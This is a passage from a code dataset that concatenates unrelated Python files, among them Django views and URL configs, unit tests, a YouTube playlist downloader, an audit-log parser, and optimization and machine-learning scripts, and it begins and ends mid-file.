\"__main__\":\r\n unittest.main(verbosity = 2, testRunner = HTMLTestRunner(output= 'reportes',report_name= 'Nueva cita')) \r\n","sub_path":"Medico/new_appoiment.py","file_name":"new_appoiment.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"434838407","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\n\n#COMECE AQUI ABAIXO\n\nn = input(\"Digite o número: \")\na=[]\nfor i in range(0, n, 1):\n a.append(input(\"Digite um valor: \"))\nsoma = 0\n\nfor i in range (1,n+1,1):\n soma=soma+(a[i]**2)\nprint (soma)\n ","sub_path":"moodledata/vpl_data/10/usersdata/64/23063/submittedfiles/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"234655277","text":"class Solution:\n def removeElement(self, nums, val):\n \"\"\"\n :type nums: List[int]\n :type val: int\n :rtype: int\n \"\"\"\n if len(nums) == 1:\n return []\n nums = sorted(nums)\n index = nums.index(val)\n j = index\n while j < len(nums) and nums[j] == nums[index]:\n j += 1\n if j == len(nums):\n return nums[:index]\n while j < len(nums):\n nums[index] = nums[j]\n j += 1\n index += 1\n return nums[:index]\n\n\"\"\"\nError Message:\n\n\"\"\"\n\n\n\"\"\"\nOther's answer:\n\nclass Solution:\n def removeElement(self, nums, val):\n start, end = 0, len(nums) - 1\n while start <= end:\n if nums[start] == val:\n nums[start], nums[end], end = nums[end], nums[start], end - 1\n else:\n start +=1\n return start\n\"\"\"","sub_path":"27.py","file_name":"27.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"108958301","text":"\"\"\" Tests for pork.py, a yaml+templates generator \"\"\"\n\nimport os, sys\nimport unittest\n\n# keep the command name hanging around, and add the pork directory\n# to the path so we can import it\nme = sys.argv[0]\nbase = os.path.split(__file__)[0]\nsys.path.insert(0,os.path.join(base,'..'))\nimport pork\n\n\nclass TestPork(unittest.TestCase):\n \"\"\" Test suite for pork. This will never be complete. \"\"\"\n def setUp(self):\n # set up the engines - we won't bother testing the engines which\n # aren't installed, so let's just try to import the root namespace\n # and see what happens\n self.engines = {}\n for engine in pork.engines:\n # special case this one. python would mean 'import string' and,\n # frankly, if that doesn't work then all bets are off\n if engine == 'python':\n continue\n # GRR why are they using uppercase module names? I thought python\n # was meant to be pythonic? I wish it _enforced_ things rather than\n # had conventions. Programming languages allow for too much\n # freedom of expression of preference, style over substance.\n # I hate how much development time is wasted in teams just by\n # the need to discuss \"coding standards\". Someone one day will make\n # a language that can only be written one way, and then the only\n # things open to debate will be the quality of algorithm, approach,\n # pattern, etc. But hopefully by then I won't be programming for a\n # living anyway.\n if engine == 'cheetah':\n engine = 'Cheetah'\n try:\n __import__(engine)\n except ImportError:\n pass\n else:\n self.engines[engine] = True\n # default config dictionary which the tests will update\n # before calling render\n self.config = {'engine':'python'}\n self.generated_files = []\n def tearDown(self):\n \"\"\" Remove generated files \"\"\"\n for file in self.generated_files:\n try:\n os.remove(file)\n except OSError:\n pass\n def render(self, values={}):\n \"\"\" Helper: render a dictionary against the default config \"\"\"\n # set up the renderer so it can be used afterwards (for spitting)\n self.renderer = pork.Renderer(self.config, values)\n return self.renderer.render()\n def slurp(self, file):\n \"\"\" Helper: read an entire file in \"\"\"\n return open(file, \"r\").read()\n def testPorkCanBeUsedToDoLiterallyNothing(self):\n \"\"\" Can Pork be used to do nothing at all? \"\"\"\n\t # this template has no tags in it, therefore the output\n\t # should match the input. passthroughs for the win.\n template = \"%s/no-tags.txt\" % base\n self.config['template']=template\n input = self.slurp(template)\n output = self.render()\n self.assertEqual(input, output)\n def testPorkCanBeUsedJustToCopyFilesIfYouReallyWant(self):\n \"\"\" Can Pork be used just to copy a file from A to B? \"\"\"\n # repeat the above test, but have a target file as well\n self.config['target'] = \"%s/no-tags-output.txt\" % base\n self.testPorkCanBeUsedToDoLiterallyNothing()\n self.renderer.spit()\n # this variable was setup in the test case we just called\n input = self.slurp(self.config['template'])\n output = self.slurp(self.config[\"target\"])\n self.assertEqual(input, output)\n self.generated_files.append(self.config[\"target\"])\n def testDjangoVariableInterpolation(self):\n \"\"\" Does (simple) django variable interpolation work? \"\"\"\n if 'django' in self.engines:\n self.config['template'] = \"%s/django-simple.txt\" % base\n self.config.update({'engine': 'django'})\n output = self.render({'world': 'everyone'})\n expected = \"Hello, everyone.\\n\"\n self.assertEqual(expected, output)\n def testJinja2VariableInterpolation(self):\n \"\"\" Does (simple) Jinja2 variable interpolation work? \"\"\"\n if 'jinja2' in self.engines:\n self.config['template'] = \"%s/jinja2-simple.txt\" % base\n self.config.update({'engine': 'jinja2'})\n output = self.render({'world': 'everyone'})\n # jinja2 strips off the trailing newline\n expected = \"Hello, everyone.\"\n self.assertEqual(expected, output)\n def testMakoVariableInterpolation(self):\n \"\"\" Does (simple) Mako variable interpolation work? \"\"\"\n if 'mako' in self.engines:\n self.config['template'] = \"%s/mako-simple.txt\" % base\n self.config.update({'engine': 'mako'})\n output = self.render({'world': 'everyone'})\n expected = \"Hello, everyone.\\n\"\n self.assertEqual(expected, output)\n def testStringDotTemplateVariableInterpolation(self):\n \"\"\" Does (simple) python variable interpolation work? \"\"\"\n self.config['template'] = \"%s/python-simple.txt\" % base\n # no need to set the engine, python's the default\n output = self.render({'world': 'everyone'})\n expected = \"Hello, everyone.\\n\"\n self.assertEqual(expected, output)\n def testCheetahVariableInterpolation(self):\n \"\"\" Does (simple) Cheetah variable interpolation work? \"\"\"\n # see rant in setUp for why Cheetah starts with a capital C\n if 'Cheetah' in self.engines:\n self.config['template'] = \"%s/cheetah-simple.txt\" % base\n output = self.render({'world': 'everyone'})\n expected = \"Hello, everyone.\\n\"\n self.assertEqual(expected, output)\n def testWastedTimeHasBeenWasted(self):\n \"\"\" Is Darren bored of writing tests to prove what he already knows?\"\"\"\n r1 = \"Test cases: for engineers with no confidence in their code,\"\n r2 = \"and managers with no trust in their engineers. Ridiculous.\"\n self.assertEqual(len(r1), len(r2))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"412513623","text":"\"\"\"PixelRides URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path,re_path\nfrom django.conf.urls import url, include\nfrom .views import *\nfrom userData import views\nfrom django.conf import settings \nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',welcomeAnimation, name=\"welcome\"),\n path('home/', landingPage, name=\"home\"),\n path('about/',about, name=\"about\"),\n path('chooseRide/',chooseRide, name=\"rides\"),\n path('closeContacts/',closeContacts, name=\"closeContacts\"),\n path('dashboard/',dashboard,name=\"dashboard\"),\n path('user/',user,name=\"user\"),\n path('wallet/',wallet,name=\"wallet\"),\n path('security/',security,name=\"security\"),\n path('locateMe/',locateMe,name=\"locateMe\"),\n path('notifications/',notifications,name=\"notifications\"),\n path('faq/',faq,name=\"faq\"),\n\tpath('checkRides/', checkRides, name=\"checkrides\"),\n path('upgrade/',upgrade,name=\"upgrade\"),\n path('chooseDriver/',chooseDriver,name=\"chooseDriver\"),\n\tpath('setBargain/',setBargain,name=\"setBargain\"),\n\tpath('getBargain/',getBargain,name=\"getBargain\"),\n\tpath('agreeRide/',agreeRide,name=\"agreeRide\"),\n\tpath('disagreeRide/',disagreeRide,name=\"disagreeRide\"),\n\tpath('checkAgreeRide/',checkAgreeRide,name=\"checkAgreeRide\"),\n\tpath('schedule/',scheduleRide,name=\"schedule_rides\"),\n\turl(r'pay/(?P\\w+?)/(?P\\w+?)/$',pay,name=\"pay\"),\n\turl(r'bargain/(?P\\w+?)/$',bargaining, name=\"bargain\"),\n\turl(r'rideOn/(?P\\w+?)/(?P\\w+?)/$',rideOn,name=\"rideOn\"),\n\turl(r'forgotPassword/(?P\\w+?)/(?P\\w+?)/$', forgotPassword, name=\"forgotPassword\"),\n\turl(r'addingStops/(?P\\w+?)/(?P\\w+?)/$',addingStops,name=\"addingStops\"),\n url(r'confirmTransaction/(?P\\w+?)/(?P\\w+?)/(?P\\w+?)/$',confirmTransaction,name=\"confirmTransaction\"),\n url(r'^userData/',include('userData.urls')),\n url(r'^logout/$', views.user_logout, name='logout'),\n url(r'verifyOtp/(?P\\w+?)/(?P\\w+?)/(?P\\w+?)/(?P\\w+?)/$', otpAuthentication, name=\"otp\"),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)","sub_path":"PixelRides/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"516398031","text":"# -*- coding: utf-8 -*-\nimport redis\n\nclass Subscribe(object):\n\n def __init__(self):\n rc = redis.Redis(host='127.0.0.1')\n ps = rc.pubsub()\n ps.subscribe(['foo', 'bar'])\n rc.publish('foo', 'hello world')\n","sub_path":"azeroth_spider/subscribe/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"235797778","text":"'''\n*******************************************************************************\n Copyright 2013 EMC Inc.\n\n[Filename]: tc_uefi_ms_AutoflashMfg.py\n[Author ]: Frank.He@emc.com\n[Purpose ]: Autoflash script for update SPA and SPB\n[Contains]: \n tc_uefi_ms_AutoflashMfg - class\n __init__\n test\n[History ]:\n******************************************************************************\n VER NAME DATE COMMENT\n******************************************************************************\n R00 Frank He 2/18/2014 Initial edition\n******************************************************************************\n'''\nfrom case.CBaseCase import *\n\nclass tc_uefi_ms_AutoflashMfg(CBaseCase):\n \n \"\"\"\n******************************************************************************\n[Purpose ]: Autoflash script for update SPA and SPB\n[Author ]: Frank.He@emc.com\n[Method ]:\n[ReqID ]: \n[Sprint ]: ATOM 2.0.13\n[Ticket ]: ATOM-970\n[Platform]: All\n[Type ]: Auto\n******************************************************************************\n \"\"\"\n def __init__(self):\n CBaseCase.__init__(self, self.__class__.__name__)\n\n\n def test(self):\n \n if self.enclosure.spa.go_to_post() != 0:\n self.result(FAIL, 'SPA: fail to go to post')\n return\n if self.enclosure.spa.auto_flash(self.obj_release.image_files_full_path()) != 0:\n self.log('ERROR','SPA: fail to auto flash')\n self.result(FAIL, 'SPA: fail to auto flash')\n \n if self.enclosure.spb.go_to_post() != 0:\n self.result(FAIL, 'SPB: fail to go to post')\n return\n if self.enclosure.spb.auto_flash(self.obj_release.image_files_full_path()) != 0:\n self.log('ERROR','SPB: fail to auto flash')\n self.result(FAIL, 'SPB: fail to auto flash')\n\n\n\n\n","sub_path":"case/OUT_OF_DATE/tc_uefi_ms_AutoflashMfg.py","file_name":"tc_uefi_ms_AutoflashMfg.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"216407990","text":"import numpy as np\n\n\nfrom datetime import datetime\n\n\n\nfrom rtctools.optimization.collocated_integrated_optimization_problem \\\n import CollocatedIntegratedOptimizationProblem\nfrom rtctools.optimization.csv_mixin import CSVMixin\nfrom rtctools.optimization.goal_programming_mixin \\\n import Goal, GoalProgrammingMixin, StateGoal\nfrom rtctools.optimization.modelica_mixin import ModelicaMixin\nfrom rtctools.util import run_optimization_problem\n\n\nclass WaterLevelRangeGoal(StateGoal):\n # Applying a state goal to every time step is easily done by defining a goal\n # that inherits StateGoal. StateGoal is a helper class that uses the state\n # to determine the function, function range, and function nominal\n # automatically.\n state = 'storage.HQ.H'\n # One goal can introduce a single or two constraints (min and/or max). Our\n # target water level range is 0.43 - 0.44. We might not always be able to\n # realize this, but we want to try.\n\n\n\n data_path = \"./input/timeseries_import.csv\"\n results = np.recfromcsv(data_path, encoding=None)\n\n month = datetime.strptime(results[\"utc\"][0], \"%Y-%m-%d %H:%M:%S\").month\n day = datetime.strptime(results[\"utc\"][0], \"%Y-%m-%d %H:%M:%S\").day\n\n print('>>>> StateGoal >>>> Month: ', month)\n print('>>>> StateGoal >>>> Day: ', day)\n\n reserve = 0.0\n if(month > 5):\n reserve = 0.02\n\n target_min = 0.43 + reserve\n target_max = 0.44 + reserve\n\n # Because we want to satisfy our water level target first, this has a\n # higher priority (=lower number).\n\n priority = 1\n\n\nclass MinimizeQpumpGoal(Goal):\n # This goal does not use a helper class, so we have to define the function\n # method, range and nominal explicitly. We do not specify a target_min or\n # target_max in this class, so the goal programming mixin will try to\n # minimize the expression returned by the function method.\n def function(self, optimization_problem, ensemble_member):\n return optimization_problem.integral('Q_pump')\n\n # The nominal is used to scale the value returned by\n # the function method so that the value is on the order of 1.\n function_nominal = 100.0\n # The lower the number returned by this function, the higher the priority.\n priority = 2\n # The penalty variable is taken to the order'th power.\n order = 1\n\n\nclass MinimizeChangeInQpumpGoal(Goal):\n # To reduce pump power cycles, we add a third goal to minimize changes in\n # Q_pump. This will be passed into the optimization problem as a path goal\n # because it is an an individual goal that should be applied at every time\n # step.\n def function(self, optimization_problem, ensemble_member):\n return optimization_problem.der('Q_pump')\n function_nominal = 5.0\n priority = 3\n # Default order is 2, but we want to be explicit\n order = 2\n\n\nclass Example(GoalProgrammingMixin, CSVMixin, ModelicaMixin,\n CollocatedIntegratedOptimizationProblem):\n \"\"\"\n An introductory example to goal programming in RCT-Tools\n \"\"\"\n def path_constraints(self, ensemble_member):\n # We want to add a few hard constraints to our problem. The goal\n # programming mixin however also generates constraints (and objectives)\n # from on our goals, so we have to call super() here.\n constraints = super().path_constraints(ensemble_member)\n\n # data_path = \"./input/timeseries_import.csv\"\n # results = np.recfromcsv(data_path, encoding=None)\n #\n # month = datetime.strptime(results[\"utc\"][0], \"%Y-%m-%d %H:%M:%S\").month\n\n # print(\"////// path_constraints --------- Month: \", month)\n\n # Release through orifice downhill only. This constraint enforces the\n # fact that water only flows downhill\n constraints.append((self.state('Q_orifice') +\n (1 - self.state('is_downhill')) * 10, 0.0, 10.0))\n\n # Make sure is_downhill is true only when the sea is lower than the\n # water level in the storage.\n M = 2 # The so-called \"big-M\"\n constraints.append((self.state('H_sea') - self.state('storage.HQ.H') -\n (1 - self.state('is_downhill')) * M, -np.inf, 0.0))\n constraints.append((self.state('H_sea') - self.state('storage.HQ.H') +\n self.state('is_downhill') * M, 0.0, np.inf))\n\n # Orifice flow constraint. Uses the equation:\n # Q(HUp, HDown, d) = width * C * d * (2 * g * (HUp - HDown)) ^ 0.5\n # Note that this equation is only valid for orifices that are submerged\n # units: description:\n w = 3.0 # m width of orifice\n d = 0.8 # m hight of orifice\n C = 1.0 # none orifice constant\n g = 9.8 # m/s^2 gravitational acceleration\n constraints.append(\n (((self.state('Q_orifice') / (w * C * d)) ** 2) / (2 * g) +\n self.state('orifice.HQDown.H') - self.state('orifice.HQUp.H') -\n M * (1 - self.state('is_downhill')),\n -np.inf, 0.0))\n\n return constraints\n\n def goals(self):\n return [MinimizeQpumpGoal()]\n\n def path_goals(self):\n # Sorting goals on priority is done in the goal programming mixin. We\n # do not have to worry about order here.\n return [WaterLevelRangeGoal(self), MinimizeChangeInQpumpGoal()]\n\n def pre(self):\n # Call super() class to not overwrite default behaviour\n super().pre()\n # We keep track of our intermediate results, so that we can print some\n # information about the progress of goals at the end of our run.\n self.intermediate_results = []\n\n def priority_completed(self, priority):\n # We want to show that the results of our highest priority goal (water\n # level) are remembered. The other information we want to see is how our\n # lower priority goal (Q_pump) progresses. We can write some code that\n # sumerizes the results and stores it.\n\n # A little bit of tolerance when checking for acceptance, because\n # strictly speaking 0.4299... is smaller than 0.43.\n reserve = 0.02\n _min = 0.43 + reserve - 1e-4\n _max = 0.44 + reserve + 1e-4\n\n results = self.extract_results()\n n_level_satisfied = sum(\n 1 for x in results['storage.HQ.H'] if _min <= x <= _max)\n q_pump_integral = sum(results['Q_pump'])\n q_pump_sum_changes = np.sum(np.diff(results['Q_pump'])**2)\n self.intermediate_results.append(\n (priority, n_level_satisfied, q_pump_integral, q_pump_sum_changes))\n\n def post(self):\n # Call super() class to not overwrite default behaviour\n super().post()\n for priority, n_level_satisfied, q_pump_integral, q_pump_sum_changes \\\n in self.intermediate_results:\n print('\\nAfter finishing goals of priority {}:'.format(priority))\n print('Level goal satisfied at {} of {} time steps'.format(\n n_level_satisfied, len(self.times())))\n print('Integral of Q_pump = {:.2f}'.format(q_pump_integral))\n print('Sum of squares of changes in Q_pump: {:.2f}'.format(q_pump_sum_changes))\n\n # Any solver options can be set here\n def solver_options(self):\n options = super().solver_options()\n solver = options['solver']\n options[solver]['print_level'] = 1\n return options\n\n\n# Run\nrun_optimization_problem(Example)\n","sub_path":"goal_programming_reserve/src/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"487551413","text":"import random\nimport string\nimport threading\nfrom queue import Queue\nimport pafy\nimport time\nimport os\n\ncounter = 0\ndirectory = \"C:/Users/morit_000/Desktop/TubeCast\"\n\n# lock to serialize console output\nlock = threading.Lock()\n\n#prints all Title and AudioLink of Profile\ndef printAudioDetail(item):\n p = item\n try:\n best = p.getbestaudio(preftype=\"m4a\")\n title = best.title[:].replace(\":\", \"_\")\n\n filepath = directory + \"/\"+title+\".\" + best.extension\n #print(\"Check: \"+filepath)\n best.download(filepath)\n print(filepath)\n except Exception as err:\n print(err)\n print(filepath)\n #print(p.title +\" \"+ err)\n q.put(p)\n #print(p.title)\n #print(threading.current_thread().name, best.url)\n filepath = directory + best.title + \".\" + best.extension\n\n\n#worker method, thread method\ndef worker():\n time.sleep(1)\n while True:\n item = q.get()\n printAudioDetail(item)\n #print(item.title)\n\n q.task_done()\n\n\nplaylist = pafy.get_playlist(\"PLpaD0ybYH0S1yYJAGHhHgJE46oEfGfl2C\")\nvideos = playlist['items']\n\n#Threadpool initialization, number of Threads\nfor i in range(100):\n t = threading.Thread(target=worker)\n t.daemon = True\n t.start()\n\n#fill Queue, gets processed by the Threads\nq = Queue()\nfor video in videos:\n q.put(video['pafy'])\n counter += 1\nq.join()\n\n#if method stops before threads --> Exception\n#time.sleep(5)\n\nprint(\"Ergebnis \"+counter.__str__())\n\n","sub_path":"old_files/mutlithread.py","file_name":"mutlithread.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"584875358","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.generic import View\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.models import User as djUser\nfrom user.models import User, Author, Image\nfrom mysite import settings\nfrom .forms import UploadFileForm\nimport os, sys, json\nfrom .models import Audio\ndef handle_uploaded_file(f):\n with open(os.path.join(settings.MEDIA_ROOT, f.name), 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\nclass Playlist(View):\n @method_decorator(login_required(login_url='/login/'))\n def get(self, request):\n user = request.user\n playlist = user.customUser.audio.all()\n return render(request, \"playlist.html\", {'playlist' : playlist, 'you': request.user.customUser, 'user' : None})\n @method_decorator(login_required(login_url='/login/'))\n def post(self, request):\n user = request.user\n params = request.POST\n try:\n xhr = request.POST['xhr']\n except:\n xhr = False\n response_dict = {}\n print(request.POST)\n if 'add' in params:\n try:\n user.customUser.audio.add(Audio.objects.get(id=int(params['add'])))\n response_dict = {'status': 'ok'}\n except:\n print(\"Unexpected error:\", sys.exc_info())\n response_dict = {'status': 'error'}\n if xhr == 'true':\n return HttpResponse(json.dumps(response_dict), content_type='application/javascript')\n return self.get(request)\n else:\n try:\n author = Author.objects.get(name = params['author'])\n except:\n author = Author.objects.create(name = params['author'], information = '')\n form = UploadFileForm(request.POST, request.FILES)\n if form.is_valid():\n handle_uploaded_file(request.FILES['audio'])\n a = Audio.objects.create(text = params['post_text'],\n author = author,\n name = params['name'],\n file = request.FILES['audio'],\n type = [params['type']],\n duration = '00:00:00')\n user.customUser.audio.add(a)\n a.save()\n return self.get(request)\nclass Audios_id(View):\n def post(self, request, path):\n user = request.user\n params = request.POST\n try:\n xhr = request.POST['xhr']\n except:\n xhr = False\n response_dict = {}\n print(request.POST)\n if 'add' in params:\n try:\n user.customUser.audio.add(Audio.objects.get(id=int(params['add'])))\n response_dict = {'status': 'ok'}\n except:\n print(\"Unexpected error:\", sys.exc_info())\n response_dict = {'status': 'error'}\n if xhr == 'true':\n return HttpResponse(json.dumps(response_dict), content_type='application/javascript')\n return self.get(request, path)\n def get(self, request, path):\n\n user = User.objects.get(id=int(path))\n print(request)\n return render(request, \"playlist.html\", {'playlist' : user.audio.all(),\n 'user' : user,\n 'you': request.user.customUser})\n # Create your views here.\n","sub_path":"audio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"532106046","text":"#!/usr/bin/env python3\n\nimport mksippscn\nimport codesamples\n\ndef testUnique(e, description):\n print(' >>>>', description)\n print('{} values:'.format(e))\n uniq = set()\n variables = vars(e)\n for var in variables:\n if not var.startswith('__') and not callable(variables[var]):\n if variables[var] not in uniq:\n uniq.add(variables[var])\n print('{:15} = {:2}'.format(var, variables[var]))\n else:\n print('{:15} = {:2} !! ERROR !! Already in use!'.format(var, variables[var]))\n rc = 1\n\ndef testNeedFormat():\n print('Not need format string test OK') if not codesamples.needFormat('not need format') \\\n else print('Not need format string test FAILED')\n print('Need some format string test OK') if codesamples.needFormat('need {some} format') \\\n else print('Need some format string test FAILED')\n print('Need format string test OK') if codesamples.needFormat('need {} format') \\\n else print('Need some format string test FAILED')\n\ndef testStatusLine(reasons, customText):\n for r in reasons:\n print('codesamples.makeStatusLine({}): '.format(r), codesamples.makeStatusLine(r))\n for r in reasons:\n print('codesamples.makeStatusLine({}, {}): '.format(r, customText), codesamples.makeStatusLine(r, customText))\n\nif __name__ == '__main__':\n testUnique(mksippscn.Errors, 'Check for unique error codes')\n testNeedFormat()\n testStatusLine([200,302,404,503,606,666,999,'string'], 'My Custom Reason')\n","sub_path":"selftest.py","file_name":"selftest.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"266076441","text":"# -*- coding: utf-8 -*-\nfrom django import template\nfrom django.core.urlresolvers import reverse, NoReverseMatch\nfrom django.template.loader import render_to_string\nfrom django.utils.safestring import mark_safe\nfrom django_jinja import library\nfrom jinja2 import contextfunction\n\n\nregister = template.Library()\n\n\n@library.global_function\n@contextfunction\n@register.simple_tag(takes_context=True)\ndef pagination(context, page_obj=None, page_kwarg='page'):\n\tpage_obj = page_obj or context['page_obj']\n\tctx = {\n\t\t'page_obj': page_obj,\n\t\t'page_kwarg': page_kwarg,\n\t\t'resolver_match': context['request'].resolver_match,\n\t\t'request': context['request'],\n\t}\n\treturn mark_safe(render_to_string(\"paginator/paginator.html\", ctx))\n\n\n@library.global_function\n@contextfunction\n@register.simple_tag(takes_context=True)\ndef pager_url(context, page_num):\n\trequest = context['request']\n\tresolver_match = context['resolver_match']\n\tpage_kwarg = context['page_kwarg']\n\tkwargs = resolver_match.kwargs.copy()\n\tkwargs[page_kwarg] = page_num\n\ttry:\n\t\turl_args = '?' + request.GET.urlencode() if request.GET else ''\n\t\treturn reverse(resolver_match.view_name, args=resolver_match.args, kwargs=kwargs) + url_args\n\texcept NoReverseMatch:\n\t\tget = request.GET.copy()\n\t\tget[page_kwarg] = page_num\n\t\tbase_url = reverse(resolver_match.view_name, args=resolver_match.args, kwargs=resolver_match.kwargs)\n\t\treturn base_url + '?' + get.urlencode()\n\n","sub_path":"paginator/templatetags/paginator.py","file_name":"paginator.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"583692524","text":"import numpy as np\ndef writejsfield(fid,name,variable,nods):\n#WRITEJSFIELD - write variable to javascript file \n#\n# Usage:\n# writejsfield(fid,name,variable)\n#\n\t#write array:\n\t#if not isinstance(variable, list):\n\tif type(variable[0])==np.float64:\n\t\tfid.write('\\n'.format(name))\n\t\tfid.write('{0}=['.format(name))\n\t\tfor i in xrange(0, nods-1):\n\t\t\tfid.write('{0},'.format(variable[i]))\n\t\tfid.write('{0}];\\n'.format(variable[-1]))\n\t\tfid.write('\\n')\n\telse:\n\t\t#multi-sized array: \n\t\tfid.write('\\n'.format(name))\n\t\tfid.write('{0}=[]\\n'.format(name))\n\t\tfor i in xrange(0, len(variable[2])):\n\t\t\tfid.write('{0}[\"{1}\"]=['.format(name,i))\n\t\t\tfor j in xrange(1, nods-1):\n\t\t\t\tfid.write('{0},'.format(variable[j][i]))\n\t\t\tfid.write('{0}];\\n'.format(variable[-1][i]))\n\t\tfid.write('\\n')\n","sub_path":"issm/writejsfield.py","file_name":"writejsfield.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"21050125","text":"import re\r\nimport os\r\nimport json\r\nimport sys \r\nimport gzip\r\n\r\nimport configparser\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\n\r\n# types represented by 1 byte\r\nint10Types = [ 'syscall', 'ppid', 'pid', 'auid', 'uid', 'gid', 'euid', 'suid', 'fsuid', 'egid', 'sgid', 'fsgid', 'items']\r\n# 64 bit byte strings\r\nint16Types = [ \"arch\" ,\"a0\", \"a1\", \"a2\", \"a3\"]\r\nfloatTypes = [\"timestamp\"]\r\nrx = re.compile(\"audit.(?P.*):(?P.*).: arch=(?P.*) syscall=(?P\\d+) (?:success=(?P.*) exit=(?P.*))?[ ]*a0=(?P.*) a1=(?P.*) a2=(?P.*) a3=(?P.*) items=(?P.*) ppid=(?P.*) pid=(?P.*) auid=(?P.*) uid=(?P.*) gid=(?P.*) euid=(?P.*) suid=(?P.*) fsuid=(?P.*) egid=(?P.*) sgid=(?P.*) fsgid=(?P.*) tty=(?P.*) ses=(?P.*) comm=(?P.*) exe=(?P.*)[ ]*(?:subj=(?P.*))? key=(?P.*)\")\r\ncompressLvl = 4\r\n\r\n\r\nsep =\"/\"\r\n# set up from config file\r\nname = \"\"\r\nconfig = configparser.ConfigParser()\r\nconfig.read('vbox.ini')\r\n\r\nmaster_vm = config['userVar']['master_vm']\r\ntime = config['userVar']['time'] \r\ncparams = config['linux']\r\n\r\nif os.name == 'nt':\r\n cparams = config['windows']\r\n sep = \"//\"\r\n\r\n\r\nhome_dir = cparams['home_dir']\r\ntest_files = cparams['test_files']\r\nbad_files = cparams['bad_files']\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef appendLogs(directoryPath,finalName):\r\n logs, numLogs = appendLogFiles(directoryPath)\r\n finalOutput = gzip.open(finalName,\"wb\",compresslevel=compressLvl)\r\n for i in range(numLogs,0,-1):\r\n logName = directoryPath+sep+logs[i-1]\r\n print(logName)\r\n dataParseRaw(logName,finalOutput)\r\n finalOutput.close()\r\n\r\ndef dataParseRaw(filePath,finalOutput):\r\n f = open(filePath,\"r\")\r\n wtf = f.readlines()\r\n for line in wtf:\r\n if line[5:12] == \"SYSCALL\":\r\n result = re.search(rx,line)\r\n if result is not None:\r\n result = result.groupdict()\r\n for x in int10Types:\r\n result[x] = int(result[x])\r\n\r\n for x in int16Types:\r\n result[x] = int(result[x],16)\r\n \r\n if result['exit'] is not None:\r\n result['exit'] = int(result['exit'])\r\n result['timestamp'] = float(result['timestamp'])\r\n j = json.dumps(result) + \"\\n\"\r\n j = j.encode('utf-8')\r\n finalOutput.write(j)\r\n\r\n \r\n\r\n\r\n\r\ndef appendLogFiles(directoryPath):\r\n try:\r\n onlyfiles = [f for f in listdir(directoryPath) if isfile(join(directoryPath, f))]\r\n onlyfiles.sort()\r\n return onlyfiles, len(onlyfiles)\r\n except FileNotFoundError:\r\n print(\"Please use a valid executable name\")\r\n sys.exit(1)","sub_path":"vBoxTest/basic/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"619232563","text":"import os\nimport sys\nimport numpy as np\nnp.random.seed(42) # for reproducibility\n\nimport pandas as pd\nimport re\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.pipeline import Pipeline\n\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.stem import SnowballStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\n# import xgboost as xgb\n\n# Constants\nTARGET = 